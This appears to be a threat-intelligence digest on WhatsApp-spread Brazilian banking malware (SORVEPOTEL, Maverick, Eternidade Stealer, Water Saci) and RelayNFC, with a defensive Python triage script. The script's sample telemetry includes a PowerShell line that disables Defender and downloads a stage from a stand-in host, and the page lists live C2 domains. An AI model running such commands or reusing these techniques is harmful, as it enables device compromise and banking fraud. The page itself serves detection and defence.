SORVEPOTEL, Maverick, and Eternidade Stealer Malware Campaigns Target Brazilian Banks via WhatsApp
Summary
A self-spreading malware named SORVEPOTEL targets Brazilian users via WhatsApp. The malware spreads through phishing messages containing malicious ZIP files, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits the trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. The malware uses a Windows shortcut (LNK) file to execute a PowerShell script, which retrieves the main payload and establishes persistence on the infected system. It also communicates with a command-and-control (C2) server for further instructions. New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time. A newly identified banking Trojan known as Eternidade Stealer has been observed pushing Brazil’s cybercrime ecosystem into a more aggressive phase, with attackers using WhatsApp as both an entry point and a propagation tool. The malware combines a WhatsApp-propagating worm, a Delphi-based stealer, and an MSI dropper to harvest financial data, system details, and contact lists. The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. 
The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts. The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch next-stage payloads from a remote server, an MSI installer for the trojan and a Python script that's responsible for spreading the malware via WhatsApp Web. The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. 
The script also runs checks to ensure that only one instance of the trojan is running at any given time. The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search for visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets. If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions."
The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLM) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs. The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.
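As an added defender-side example (not code from this page or from any of the cited reports), the routine below scores constructed endpoint telemetry against the Windows-side behaviours summarised above: an LNK-launched PowerShell stage that tampers with Defender/UAC and downloads a payload, Startup-folder persistence, the "executed.dat" marker, a hollowed svchost.exe with an unexpected parent, contact with the two named C2 domains, and IMAP traffic to terra.com.br from a non-mail process. The event schema, the process name AutoIt3.exe, the mail-client allow-list and every sample value are assumptions made for the example.

```python
"""Triage of constructed endpoint telemetry against the WhatsApp worm /
banking-trojan behaviours described on this page (defender-side example)."""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Indicators and behaviours taken from the write-up (domains written plainly, not defanged).
C2_DOMAINS = {"manoelimoveiscaioba.com", "serverseistemasatu.com"}
MAILBOX_C2_DOMAIN = "terra.com.br"          # IMAP mailbox used to fetch C2 details / commands
MARKER_FILE = "executed.dat"                # single-instance marker dropped by the AutoIt script
STARTUP_DIR = "\\start menu\\programs\\startup\\"   # SORVEPOTEL persistence location
IMAP_PORTS = {143, 993}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}    # assumption: processes expected to speak IMAP
TAMPER_MARKERS = ("disablerealtimemonitoring", "enablelua")          # Defender / UAC tampering
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile", "iwr ")


@dataclass(frozen=True)
class Event:
    kind: str                 # "process" | "file" | "network"
    pid: int
    image: str                # image name of the acting process
    parent_image: str = ""    # process events only
    cmdline: str = ""         # process events only
    path: str = ""            # file events only
    dest: str = ""            # network events: destination host
    dest_port: int = 0


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    image: str
    weight: int               # contribution to the per-process score


def _process_rules(e: Event) -> Iterable[Finding]:
    image, parent, cmd = e.image.lower(), e.parent_image.lower(), e.cmdline.lower()
    if image == "powershell.exe" and parent == "explorer.exe" and any(m in cmd for m in DOWNLOAD_MARKERS):
        # An LNK opened from a chat download runs PowerShell under explorer.exe to fetch the next stage.
        yield Finding("lnk_powershell_download", e.pid, e.image, 3)
    if image == "powershell.exe" and any(m in cmd for m in TAMPER_MARKERS):
        yield Finding("defender_or_uac_tampering", e.pid, e.image, 4)
    if image == "svchost.exe" and parent != "services.exe":
        # Genuine svchost.exe instances are started by services.exe; anything else is a hollowing candidate.
        yield Finding("svchost_unexpected_parent", e.pid, e.image, 4)


def _file_rules(e: Event) -> Iterable[Finding]:
    path = e.path.lower()
    if STARTUP_DIR in path:
        yield Finding("startup_folder_persistence", e.pid, e.image, 3)
    if path.endswith("\\" + MARKER_FILE):
        yield Finding("executed_dat_marker", e.pid, e.image, 2)


def _network_rules(e: Event) -> Iterable[Finding]:
    host = e.dest.lower().rstrip(".")
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        yield Finding("known_c2_domain", e.pid, e.image, 5)
    mailbox = host == MAILBOX_C2_DOMAIN or host.endswith("." + MAILBOX_C2_DOMAIN)
    if mailbox and e.dest_port in IMAP_PORTS and e.image.lower() not in MAIL_CLIENTS:
        yield Finding("imap_mailbox_c2", e.pid, e.image, 4)


RULES = {"process": _process_rules, "file": _file_rules, "network": _network_rules}


def triage(events: Iterable[Event]) -> List[Finding]:
    findings: List[Finding] = []
    for e in events:
        findings.extend(RULES.get(e.kind, lambda _e: ())(e))
    return findings


def score_by_pid(findings: Iterable[Finding]) -> Dict[int, int]:
    """Sum rule weights per process so a chain (download + tamper + persist) outranks a lone hit."""
    scores: Dict[int, int] = {}
    for f in findings:
        scores[f.pid] = scores.get(f.pid, 0) + f.weight
    return scores


def verdict(events: Iterable[Event], threshold: int = 6) -> dict:
    findings = triage(list(events))
    scores = score_by_pid(findings)
    return {"rules": sorted({f.rule for f in findings}),
            "flagged_pids": sorted(pid for pid, s in scores.items() if s >= threshold)}


# Constructed sample telemetry (not real logs); the last three events are benign controls.
SAMPLE_EVENTS = [
    Event("process", 101, "powershell.exe", parent_image="explorer.exe",
          cmdline='powershell -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
                  'Invoke-WebRequest http://stage.example.invalid/p"'),
    Event("file", 101, "powershell.exe",
          path=r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"),
    Event("file", 202, "AutoIt3.exe", path=r"C:\Users\alice\AppData\Local\Temp\executed.dat"),
    Event("network", 202, "AutoIt3.exe", dest="manoelimoveiscaioba.com", dest_port=443),
    Event("process", 303, "svchost.exe", parent_image="AutoIt3.exe"),
    Event("network", 303, "svchost.exe", dest="terra.com.br", dest_port=993),
    Event("process", 404, "svchost.exe", parent_image="services.exe"),
    Event("network", 405, "outlook.exe", dest="mail.example.com", dest_port=993),
    Event("file", 406, "explorer.exe", path=r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    print(verdict(SAMPLE_EVENTS))
```

Per-process scoring is what separates the sample's three malicious chains from the benign controls; a single rule hit such as one IMAP connection stays below the threshold on its own.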
Timeline
- 03.12.2025 17:32 · 1 article · 23h ago
Water Saci Uses Sophisticated Infection Chain to Deploy Banking Trojan
The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch next-stage payloads from a remote server, an MSI installer for the trojan and a Python script that's responsible for spreading the malware via WhatsApp Web. The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given time. The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search for visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets.
If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions." The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLM) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs.
Sources:
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- 03.12.2025 17:32 · 1 article · 23h ago
RelayNFC Android Malware Targets Brazilian Banking Users
The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.
Sources:
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- 19.11.2025 17:00 · 3 articles · 15d ago
Eternidade Stealer Trojan Targets Brazilian Financial Institutions
The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp. The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts.
Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- 11.11.2025 20:37 · 3 articles · 22d ago
SORVEPOTEL Linked to Maverick Banking Malware
New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time.
Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- 03.10.2025 15:02 · 4 articles · 2mo ago
SORVEPOTEL Malware Spreads via WhatsApp in Brazil
A self-spreading malware named SORVEPOTEL targets Brazilian users via WhatsApp. The malware spreads through phishing messages containing malicious ZIP files, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits the trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. The malware uses a Windows shortcut (LNK) file to execute a PowerShell script, which retrieves the main payload and establishes persistence on the infected system. It also communicates with a command-and-control (C2) server for further instructions.
Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Information Snippets
- SORVEPOTEL spreads through phishing messages with malicious ZIP file attachments on WhatsApp.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware targets Windows systems and is designed for rapid propagation.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The campaign primarily affects Brazilian users, with 457 out of 477 infections concentrated in Brazil.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware uses a Windows shortcut (LNK) file to execute a PowerShell script.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware establishes persistence by copying itself to the Windows Startup folder.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware communicates with a C2 server to fetch further instructions or additional malicious components.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware spreads through WhatsApp Web, leading to account bans for excessive spam.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The campaign impacts various sectors including government, public service, manufacturing, technology, education, and construction.
  First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Maverick malware targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions.
  First reported: 11.11.2025 20:37 · 2 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Maverick is spread via WhatsApp Web and is linked to the SORVEPOTEL malware.
  First reported: 11.11.2025 20:37 · 2 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware uses a Windows shortcut (LNK) file to execute a PowerShell script that connects to an external server to download the first-stage payload.
  First reported: 11.11.2025 20:37 · 2 sources, 3 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The PowerShell script disables Microsoft Defender Antivirus and UAC, and retrieves a .NET loader.
  First reported: 11.11.2025 20:37 · 2 sources, 3 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The loader features anti-analysis techniques and downloads the main modules of the attack: SORVEPOTEL and Maverick.
  First reported: 11.11.2025 20:37 · 2 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Maverick is only installed after ensuring the victim is located in Brazil by checking the time zone, language, region, and date and time format.
  First reported: 11.11.2025 20:37 · 2 sources, 3 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware is used to target hotels in Brazil, indicating a possible expansion of targeting.
  First reported: 11.11.2025 20:37 · 1 source, 2 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands.
  First reported: 11.11.2025 20:37 · 2 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time.
  First reported: 11.11.2025 20:37 · 2 sources, 3 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Eternidade Stealer combines a WhatsApp-propagating worm, a Delphi-based stealer, and an MSI dropper to harvest financial data, system details, and contact lists.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware uses an obfuscated VBScript to download two payloads: a Python-written WhatsApp worm and an installer that deploys a Delphi-built banking Trojan.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The Eternidade Stealer component activates only on systems using Brazilian Portuguese and scans for banking, fintech, and cryptocurrency applications before triggering credential-harvesting overlays.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The malware stores hard-coded email credentials that allow it to pull fresh C2 details from an IMAP mailbox for extra resilience against takedowns.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The dropper installs several components, including AutoIt-based scripts that perform reconnaissance, detect antivirus tools, gather system telemetry, and decrypt embedded payloads.
  First reported: 19.11.2025 17:00 · 2 sources, 2 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The stealer checks for prior infection, collects host information and browser window details, and targets applications from banks such as Itaú, Santander, Bradesco, and Caixa, along with services like MercadoPago and Binance.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
